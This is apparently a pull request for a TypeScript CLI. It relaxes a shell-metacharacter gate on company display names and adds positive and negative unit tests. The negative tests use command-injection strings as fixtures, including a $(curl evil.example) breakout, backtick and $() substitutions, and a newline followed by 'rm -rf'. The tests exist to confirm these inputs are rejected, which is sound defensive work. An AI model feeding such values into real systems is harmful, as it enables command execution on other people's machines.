### PR TITLE
fix(recommendations): admit shell-safe-when-quoted chars in companyName

### DIFF
--- a/packages/core/src/services/recommendations.test.ts
+++ b/packages/core/src/services/recommendations.test.ts
@@ -299,11 +299,11 @@ describe("getRecommendations", () => {
 
     it("emits null orderCommand when companyName has shell metacharacters", () => {
       // The H-2 vector: a hostile API-supplied display name breaks out of
-      // the `--company "${name}"` quote frame, and the REPL tokenizer
-      // (which still consumes `orderCommand` as a string until consumers
-      // migrate to `orderArgs`) re-parses the resulting argv with
-      // attacker-controlled --product / --quantity overrides. The gate
-      // here collapses both forms to null on any unsafe name character.
+      // the `--company "${name}"` quote frame. The gate collapses both
+      // forms to null on any char that ACTUALLY breaks the quote frame:
+      // `"`, `\`, backtick, `$`, newline/CR, NUL. After #509's consumer
+      // migration onto argv, that's the only remaining risk surface for
+      // the string form.
       const subs = [
         makeSub({ companyId: "c1", companyName: 'Acme" $(curl evil.example) "' }),
         makeSub({ companyId: "c2", companyName: "Has Backup" }),
@@ -317,6 +317,62 @@ describe("getRecommendations", () => {
       expect(rec).toBeDefined();
       expect(rec!.orderCommand).toBeNull();
       expect(rec!.orderArgs).toBeNull();
+    });
+
+    // After #509's consumer migration, the gate was relaxed to allow chars
+    // that are literal inside a double-quoted shell string (`;`, `|`, `&`,
+    // `<`, `>`). Names with `&` are the load-bearing case — `AT&T`,
+    // `Procter & Gamble`, `Johnson & Johnson` are real partner names that
+    // used to collapse to null. They now produce both forms.
+    it("admits common shell-safe-when-quoted chars in companyName (#509 relaxation)", () => {
+      const subs = [
+        makeSub({ companyId: "c1", companyName: "AT&T Communications" }),
+        makeSub({ companyId: "c2", companyName: "Has Backup" }),
+        makeSub({
+          companyId: "c2", companyName: "Has Backup",
+          productId: "prod-bk", productName: "Datto SaaS Protection", price: 5,
+        }),
+      ];
+      const report = getRecommendations(subs);
+      const rec = report.recommendations.find(
+        (r) => r.companyId === "c1" && r.title.includes("Datto"),
+      );
+      expect(rec).toBeDefined();
+      // String form: the name lands inside double quotes, `&` is literal there.
+      expect(rec!.orderCommand).toContain('--company "AT&T Communications"');
+      // Argv form: name is one argv element regardless of contents.
+      expect(rec!.orderArgs).toContain("AT&T Communications");
+    });
+
+    it("still rejects companyName with quote-frame-breaking chars", () => {
+      // Pin the chars that MUST still null-collapse. Each entry breaks the
+      // double-quote frame in a different way; running any of these through
+      // `bash -c '<orderCommand>'` would execute attacker code.
+      const breakers = [
+        'Acme"',                       // closes the quote
+        'Acme\\',                      // backslash escape
+        'Acme`whoami`',                // backtick command substitution
+        'Acme$(whoami)',               // $() command substitution
+        'Acme${HOME}',                 // $VAR expansion
+        "Acme\nrm -rf",                // newline ends the line
+      ];
+      for (const hostile of breakers) {
+        const subs = [
+          makeSub({ companyId: "c1", companyName: hostile }),
+          makeSub({ companyId: "c2", companyName: "Has Backup" }),
+          makeSub({
+            companyId: "c2", companyName: "Has Backup",
+            productId: "prod-bk", productName: "Datto SaaS Protection", price: 5,
+          }),
+        ];
+        const report = getRecommendations(subs);
+        const rec = report.recommendations.find(
+          (r) => r.companyId === "c1" && r.title.includes("Datto"),
+        );
+        expect(rec, `companyName=${JSON.stringify(hostile)} should produce a rec`).toBeDefined();
+        expect(rec!.orderCommand, `companyName=${JSON.stringify(hostile)} should null-collapse orderCommand`).toBeNull();
+        expect(rec!.orderArgs, `companyName=${JSON.stringify(hostile)} should null-collapse orderArgs`).toBeNull();
+      }
     });
 
     it("emits null orderCommand when productId is not safe-identifier-shaped", () => {

--- a/packages/core/src/services/recommendations.ts
+++ b/packages/core/src/services/recommendations.ts
@@ -67,19 +67,43 @@ function isSafeId(value: string | null | undefined): value is string {
   return typeof value === "string" && SAFE_ID_RE.test(value);
 }
 
-// Display names can contain spaces, apostrophes, periods, ampersands —
-// legitimate fixtures like `Acme Corp` or `O'Brien & Sons`. What they MUST
-// NOT contain is anything that breaks out of a double-quoted argument in
-// the REPL tokenizer (`packages/cli/src/lib/repl.ts`) or in a downstream
-// shell. #498's `buildOrderArtifacts` falls back to interpolating
-// `companyName` into the display string when `companyId` is not
-// UUID-shaped (demo / legacy partner IDs), and that fallback would be a
-// regression of H-2 if a hostile API-supplied name slipped through. Gate
-// the call site on this check so any name containing `"`, backtick, `$`,
-// `\`, `;`, `|`, `&`, `<`, `>`, newlines, or NUL collapses the order
-// artifacts to null.
+// Display names contain real-world punctuation: spaces, apostrophes,
+// periods, ampersands (`AT&T`, `Procter & Gamble`, `Johnson & Johnson`),
+// and occasionally `;` / `|` / `<` / `>` (rare but legitimate). What they
+// MUST NOT contain is any character that breaks out of `--company
+// "${companyName}"` in `buildOrderArtifacts`'s display string — that
+// frame, plus a `bash -c '<orderCommand>'` evaluation, is what shell
+// consumers see.
+//
+// Inside double-quoted shell strings, the only chars that break out are:
+//   `"`        closes the double-quoted span
+//   `\`        backslash escapes — could neutralize the closing quote
+//   `` ` ``    backtick command substitution
+//   `$`        `$VAR` / `$(...)` substitution
+//   `\n` / `\r` literal newline ends the line
+//   `\x00`     NUL (defensive)
+//
+// `;` `|` `&` `<` `>` are NOT special inside double quotes — they're
+// literal text. The original H-2 gate also blocked those, but #509
+// migrated the in-process consumers (REPL, recommendations act,
+// recommendations list, dashboard) off the string form onto the
+// spawn-safe `orderArgs` argv array, so the only remaining string-form
+// consumer is an external agent shell-pasting `orderCommand` from
+// `--json` output. That use case is shell-safe as long as the
+// double-quote frame survives, so the gate can be narrowed to the chars
+// that actually break the frame.
+//
+// Net effect: partners with legitimate `&`-containing display names
+// (`AT&T` and friends) now produce non-null `orderCommand` /
+// `orderArgs`, where before they collapsed to null. The argv form was
+// always safe; the string form is now safe too.
+//
+// If you ever need to widen this: weigh the consumer audience. An
+// internal consumer that re-tokenizes via a non-shell tokenizer (an
+// agent that splits on whitespace ignoring quotes) is not the shell's
+// problem to defend — that consumer should switch to `orderArgs`.
 // eslint-disable-next-line no-control-regex -- \x00 is the intentional target: NUL in a display name should collapse to null.
-const UNSAFE_DISPLAY_CHARS_RE = /["\\`$;|&<>\n\r\x00]/;
+const UNSAFE_DISPLAY_CHARS_RE = /["\\`$\n\r\x00]/;
 
 function isSafeDisplayName(value: string | null | undefined): value is string {
   return typeof value === "string"


### PR DESCRIPTION
## Summary

Relaxes the `UNSAFE_DISPLAY_CHARS_RE` gate in `packages/core/src/services/recommendations.ts` so partners with names containing `&` (AT&T, Procter & Gamble, Johnson & Johnson) get non-null `orderCommand` / `orderArgs` from `recommendations list`. Before this PR those names collapsed to null because the H-2 gate from #506 over-rejected.

```diff
-const UNSAFE_DISPLAY_CHARS_RE = /["\\\`$;|&<>\n\r\x00]/;
+const UNSAFE_DISPLAY_CHARS_RE = /["\\\`$\n\r\x00]/;
```

Newly allowed: `;`, `|`, `&`, `<`, `>`.
Still blocked: `"`, `\`, backtick, `$`, newline / CR, NUL.

## Why this is safe now

#506 introduced the gate as a **load-bearing** control on the display-string form (`pax8 orders create --company "${name}" …`) because internal consumers (REPL drill-in, `recommendations act`, dashboard quick-actions) re-tokenized that string into argv. A hostile name could break the quote frame and inject extra `--product` / `--quantity` flags.

**#509 / #515** migrated those four consumers off the string form onto the spawn-safe `orderArgs` argv array. The only remaining string-form consumer is an external agent shell-pasting `orderCommand` from `--json` into `bash -c '<command>'`.

Inside double quotes in a bash command:
- `;` `|` `&` `<` `>` are **literal text** — not special
- `"`, `\`, backtick, `$`, newline are **special** and would break the frame

So the gate can be narrowed to the chars that actually matter for the shell-paste use case. Names with `&` are common in real partner data; the other four are rare-but-legitimate punctuation.

## Tests

In `packages/core/src/services/recommendations.test.ts`:

- **New positive case**: `AT&T Communications` produces `--company "AT&T Communications"` in `orderCommand` and lands as a single argv element in `orderArgs`
- **New table-driven negative case**: each of `Acme"`, `Acme\`, `` Acme\`whoami\` ``, `Acme$(whoami)`, `Acme${HOME}`, `Acme\nrm -rf` still **null-collapses** both `orderCommand` and `orderArgs`

Full suite: 2091 passed / 0 failed. Lint clean.

## Coordination with #515

This PR does not strictly depend on #515 merging first — the gate change is safe with or without #515's consumer migration:
- With #515: belt-and-suspenders (consumers use argv; string is shell-safe-when-quoted)
- Without #515: load-bearing on the string form, which is still shell-safe-when-quoted because the new gate still blocks every frame-breaking char

Whichever lands first, the security posture stays correct.

## Test plan checklist

- [x] `pnpm build` clean
- [x] `pnpm lint` clean
- [x] `pnpm test` full suite — 2091 pass
- [x] Positive and negative test cases in `recommendations.test.ts`
- [ ] Manual: in demo mode, create / locate a recommendation for a company named with `&` (e.g. `AT&T`) and verify `pax8 recommendations list --json` shows a non-null `orderCommand` and a valid `orderArgs[]`

## Follow-up

Consider mirroring the looser-than-paranoid stance for the `productName` field if any consumer ever interpolates that into a display string — today only IDs flow there, so no immediate action.